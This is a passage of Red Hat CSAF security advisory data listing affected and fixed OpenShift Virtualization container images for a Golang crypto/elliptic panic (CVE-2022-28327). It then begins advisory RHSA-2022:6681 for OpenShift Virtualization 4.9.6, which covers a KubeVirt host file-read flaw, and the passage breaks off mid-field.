[ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2077689", }, ], notes: [ { category: "description", text: "An integer overflow flaw was found in Golang's crypto/elliptic library. This flaw allows an attacker to use a crafted scaler input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: panic caused by oversized scalar", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang & go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-28327", }, { category: "external", summary: "RHBZ#2077689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077689", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-28327", url: "https://www.cve.org/CVERecord?id=CVE-2022-28327", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-28327", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-28327", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", url: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", }, ], release_date: "2022-04-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: panic caused by oversized scalar", }, ], }
RHSA-2022:6681
Vulnerability from csaf_redhat
Published
2022-09-22 08:16
Modified
2025-03-19 16:46
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This advisory contains the following OpenShift Virtualization 4.9.6 images:
RHEL-8-CNV-4.9
==============
cnv-must-gather-container-v4.9.6-7
kubevirt-template-validator-container-v4.9.6-6
kubevirt-ssp-operator-container-v4.9.6-5
virt-cdi-uploadserver-container-v4.9.6-4
virt-cdi-cloner-container-v4.9.6-4
virt-cdi-importer-container-v4.9.6-4
virt-cdi-uploadproxy-container-v4.9.6-4
virt-cdi-apiserver-container-v4.9.6-4
virt-cdi-controller-container-v4.9.6-4
virt-cdi-operator-container-v4.9.6-4
hostpath-provisioner-container-v4.9.6-3
hyperconverged-cluster-webhook-container-v4.9.6-3
hyperconverged-cluster-operator-container-v4.9.6-3
node-maintenance-operator-container-v4.9.6-4
kubevirt-vmware-container-v4.9.6-3
kubevirt-v2v-conversion-container-v4.9.6-3
ovs-cni-plugin-container-v4.9.6-3
cnv-containernetworking-plugins-container-v4.9.6-3
bridge-marker-container-v4.9.6-4
ovs-cni-marker-container-v4.9.6-3
kubemacpool-container-v4.9.6-4
kubernetes-nmstate-handler-container-v4.9.6-5
cluster-network-addons-operator-container-v4.9.6-5
virt-controller-container-v4.9.6-9
virt-handler-container-v4.9.6-9
virt-api-container-v4.9.6-9
virt-operator-container-v4.9.6-9
virt-artifacts-server-container-v4.9.6-9
virt-launcher-container-v4.9.6-9
libguestfs-tools-container-v4.9.6-9
virtio-win-container-v4.9.6-3
hostpath-provisioner-operator-container-v4.9.6-3
vm-import-operator-container-v4.9.6-3
vm-import-controller-container-v4.9.6-3
vm-import-virtv2v-container-v4.9.6-3
hco-bundle-registry-container-v4.9.6-51
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.9.6 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This advisory contains the following OpenShift Virtualization 4.9.6 images:\n\nRHEL-8-CNV-4.9\n==============\ncnv-must-gather-container-v4.9.6-7\nkubevirt-template-validator-container-v4.9.6-6\nkubevirt-ssp-operator-container-v4.9.6-5\nvirt-cdi-uploadserver-container-v4.9.6-4\nvirt-cdi-cloner-container-v4.9.6-4\nvirt-cdi-importer-container-v4.9.6-4\nvirt-cdi-uploadproxy-container-v4.9.6-4\nvirt-cdi-apiserver-container-v4.9.6-4\nvirt-cdi-controller-container-v4.9.6-4\nvirt-cdi-operator-container-v4.9.6-4\nhostpath-provisioner-container-v4.9.6-3\nhyperconverged-cluster-webhook-container-v4.9.6-3\nhyperconverged-cluster-operator-container-v4.9.6-3\nnode-maintenance-operator-container-v4.9.6-4\nkubevirt-vmware-container-v4.9.6-3\nkubevirt-v2v-conversion-container-v4.9.6-3\novs-cni-plugin-container-v4.9.6-3\ncnv-containernetworking-plugins-container-v4.9.6-3\nbridge-marker-container-v4.9.6-4\novs-cni-marker-container-v4.9.6-3\nkubemacpool-container-v4.9.6-4\nkubernetes-nmstate-handler-container-v4.9.6-5\ncluster-network-addons-operator-container-v4.9.6-5\nvirt-controller-container-v4.9.6-9\nvirt-handler-container-v4.9.6-9\nvirt-api-container-v4.9.6-9\nvirt-operator-container-v4.9.6-9\nvirt-artifacts-server-container-v4.9.6-9\nvirt-launcher-container-v4.9.6-9\nlibguestfs-tools-container-v4.9.6-9\nvirtio-win-container-v4.9.6-3\nhostpath-provisioner-operator-container-v4.9.6-3\nvm-import-operator-container-v4.9.6-3\nvm-import-controller-container-v4.9.6-3\nvm-import-virtv2v-container-v4.9.6-3\nhco-bundle-registry-container-v4.9.6-51\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative 